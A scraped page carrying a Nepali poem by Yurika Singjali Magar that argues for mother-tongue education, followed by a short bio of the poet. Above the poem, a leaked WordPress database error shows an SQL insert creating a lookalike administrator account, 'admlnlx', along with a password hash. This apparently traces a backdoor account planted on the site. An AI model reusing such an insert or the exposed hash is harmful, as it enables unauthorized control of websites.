WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlLu1KN4gVcBlwdn.9n8WRGAqn2DPk0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:30:51', '', 'admlnlx', 'admlnlx')
किन हराउदैछन् कुन्नी
मातृभाषाहरु आज ?
सयाद शिक्षामा सहजै स्थान नपाउनाले ।
यदि नेपाली भाषा सरह प्रथामिकता पाउने हो भने
बालअधिकारको सम्मान हुनेछ
मातृभाषाको शिक्षा पाउनाले ।
किन रुन्छन् विद्यार्थीहरु कुन्नी
विद्यालयमा आज ?
शिक्षाको एकभाषिक नीति र विधि नबुझ्नाले ।
यदि नेपाली भाषा सरह प्रथामिकता पाउने हो भने
विद्यार्थीको संज्ञानात्मक विकासमा मद्दत पुग्छ
मातृभाषाको शिक्षा पाउनाले ।
किन छोड्छन् विद्यार्थीले कुन्नी
बिचैमा आज ?
शिक्षामा आफ्नो मातृभाषा पढाइ नहुनाले
यदि नेपाली भाषा सरह प्रथामिकता पाउने हो भने
विद्यार्थीको छोड्ने दर कम हुनेछ
मातृभाषाको शिक्षा पाउनाले
किन हो छोड्नेले छोडिसके, कमजोर छ कुन्नी
नछोड्नेहरु आज ?
मातृभाषा नपढी अर्को भाषामा पढ्ने बाध्यताले
यदि नेपाली भाषा सरह प्रथामिकता पाउने हो भने
विद्यार्थीको शैक्षिक उपलब्धि बढ्न सक्छ
मातृभाषाको शिक्षा पाउनाले ।
किन कमजोर छ कुन्नी
समग्रमा शिक्षाको स्थिति आज ?
मातृभाषाको नियम लागु नगर्नाले ।
यदि नेपाली भाषा सरह प्रथामिकता पाउने हो भने
राष्ट्रिय एकतामा बल पुग्नेछ
मातृभाषाको शिक्षा पाउनाले ।
***
कवि युरिका सिङ्जाली मगर भाषाविज्ञानका स्नातकोत्तर हुन् । कवि तथा भाषिक अभियन्ता उनी मगर ढुट भाषाका मातृभाषी हुन् । कवि मगरसँग सामाजिक संजालमा जोडिन यहाँ क्लिक गर्नुहोस् ।